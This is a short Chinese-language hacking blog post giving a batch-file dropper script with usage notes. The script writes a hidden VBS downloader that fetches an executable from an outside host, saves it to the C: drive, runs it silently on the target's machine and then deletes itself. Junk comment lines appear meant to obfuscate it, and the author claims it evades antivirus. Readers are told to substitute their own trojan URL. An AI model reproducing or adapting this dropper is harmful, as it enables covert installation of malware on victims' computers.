我测试了一下，完全可以的。源脚本代码如下：

@echo iLocal = LCase("C:\hack520org.exe"):iRemote = LCase("http://www.hack520.org/hack.exe"):'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo xPost.Open "GET",iRemote,0 >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo xPost.Send()  >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo Set sGet = CreateObject("ADODB.Stream") >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo sGet.Mode = 3 >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo sGet.Type = 1  >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo sGet.Open()  >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo sGet.Write(xPost.responseBody)  >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo sGet.SaveToFile iLocal,2 >>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo Set Runner=CreateObject("Wscript.Shell")>>dhe.vbs
@echo 'if 1=2 then Wscript.echo "Impossible!">>dhe.vbs
@echo Runner.run iLocal>>dhe.vbs
dhe.vbs
del dhe.vbs

以上脚本代码思路很明显,就是用批处理方式向对方电脑写入一个VBS脚本下载者(dhe.vbs),然后运行此脚本下载者(放心,对方不会出现运行窗口),最后删除此下载者,目前脚本是免杀的。
以上脚本中的"http://www.hack520.org/hack.exe"是马儿的http下载地址(这个hack520org.exe是测试的软件,无毒,不会自删除),其中"c:\hack520org.exe是马儿下载者的存放路径和文件名,不防测试一下哦,(本地测试可将脚本保存成xxx.bat运行测试,注意hack520org.exe会下载到C盘的根目录下,运行bat文件会出现CMD窗口一闪而过),使用中改为你自已的东东就可以了。

作者：D贺。文章转载请注明出处。